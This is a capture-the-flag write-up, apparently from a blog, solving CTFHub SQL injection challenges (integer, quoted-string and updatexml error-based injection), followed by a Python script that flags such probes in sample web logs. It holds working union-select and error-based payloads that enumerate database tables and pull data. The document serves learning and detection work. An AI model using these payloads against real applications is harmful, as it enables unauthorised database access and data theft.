CTFHub Web topic study notes (SQL injection writeup)

SQL injection problems under the Web category

1. Integer injection

Using Burp Suite, send ?id=1%20and%201=1

The data for id=1 still appears, which shows that an integer injection exists.

Standard procedure: first determine the number of columns and the echo positions.

?id=1%20order%20by%202

The number of columns is 2.

?id=1%20and%201=2%20union%20select%201,2

1 and 2 are the echo positions; next, look up the table names.

?id=1%20and%201=2%20union%20select%20group_concat(table_name),2%20from%20information_schema.tables%20where%20table_schema=database()

Two tables are visible; continue by checking the columns inside the flag table.

?id=1%20and%201=2%20union%20select%20group_concat(column_name),2%20from%20information_schema.columns%20where%20table_name=%27flag%27

The flag table contains a flag column.

?id=1%20and%201=2%20union%20select%20group_concat(flag),2%20from%20flag

Get the flag.

2. Character (string) injection

After entering 1, the displayed SQL statement shows that our input is wrapped in single quotes.

?id=1' and 1=1--+

The single quote is closed successfully; the rest of the injection is almost the same as before.

The final payload is:

?id=1' and 1=2 union select group_concat(flag),2 from flag--+

We get the flag. The difference from integer injection lies in closing the quotes around the injected value.

3. Error-based injection

Error-based injection extracts the information we need from the error message the application returns.

Here we use the updatexml() function for error-based injection.

UPDATEXML(XML_document, XPath_string, new_value);
First argument: XML_document, a string, the name of the XML document object (called Doc in the documentation).
Second argument: XPath_string, a string in XPath format; if you are unfamiliar with XPath syntax, look up a tutorial online.
Third argument: new_value, a string that replaces the matching data that was found.
Purpose: change the value of the nodes in the document that match the condition.

An example payload:

id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

The reason updatexml raises an error is simple: its second argument must be a string in XPath format, but our second argument clearly is not; it is the data we want to retrieve. So an error is raised, and the error message displays that content, which gives us the data we want.

?id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

We then continue injecting; the payload to query the flag is:

?id=1 and (updatexml(1,concat(0x7e,(select group_concat(flag) from flag),0x7e),1));

Because the previous two problems both used a flag column, this time I guessed it directly.

However, the XPath error only shows 32 characters of the result, so the displayed flag is clearly incomplete; we need the mid() function to take a substring so that the data after the 32nd character is displayed.

?id=1 and (updatexml(1,concat(0x7e,mid((select group_concat(flag) from flag),32),0x7e),1));

Get the remaining data and obtain the flag.

Will update after doing some LeetCode.
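As an added defender-side example (not part of the original writeup), the following Python script scans constructed web-server access-log lines for the probes the three sections above rely on: order by column counting, union select with information_schema enumeration, a closed quote followed by a comment, and updatexml()/extractvalue() error-based extraction. The log format, signature regexes and sample lines are assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus, urlparse

# Signatures for the probe styles used in the writeup; constructed for this example
# and matched against the lower-cased, URL-decoded query string.
SIGNATURES = {
    "column_probe": re.compile(r"\border\s+by\s+\d+"),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b"),
    "error_based": re.compile(r"\b(updatexml|extractvalue)\s*\("),
    "quote_close": re.compile(r"'\s*(and|or)\b.*(--|#)"),
}

# Combined-log request line (assumed format): client, request target, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def decode_target(target):
    """URL-decode the query string twice so %2520-style double encoding is also seen."""
    query = urlparse(target).query
    return unquote_plus(unquote_plus(query)).lower()

def classify(target):
    """Return the sorted names of every signature matching the decoded query string."""
    decoded = decode_target(target)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))

def scan_log(lines):
    """Return (client, status, hits) for every log line whose query matches a signature."""
    flagged = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        hits = classify(target)
        if hits:
            flagged.append((client, int(status), hits))
    return flagged

# Constructed sample log replaying the writeup's payloads against a test app.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2020:12:00:01 +0800] "GET /sqli/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [10/Mar/2020:12:00:02 +0800] "GET /sqli/?id=1%20order%20by%202 HTTP/1.1" 200 512
10.0.0.5 - - [10/Mar/2020:12:00:03 +0800] "GET /sqli/?id=1%20and%201=2%20union%20select%20group_concat(table_name),2%20from%20information_schema.tables%20where%20table_schema=database() HTTP/1.1" 200 640
10.0.0.5 - - [10/Mar/2020:12:00:04 +0800] "GET /sqli/?id=1'%20and%201=1--+ HTTP/1.1" 200 512
10.0.0.5 - - [10/Mar/2020:12:00:05 +0800] "GET /sqli/?id=1%20and%20(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1" 500 300
10.0.0.9 - - [10/Mar/2020:12:00:06 +0800] "GET /about HTTP/1.1" 200 2048
"""

for client, status, hits in scan_log(SAMPLE_LOG.splitlines()):
    print(f"{client} status={status} hits={','.join(hits)}")
```

The HTTP 500 on the updatexml request is the server-side symptom of error-based injection; pairing it with the signature hit makes a useful alert rule.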

Origin www.cnblogs.com/Cl0ud/p/12419200.html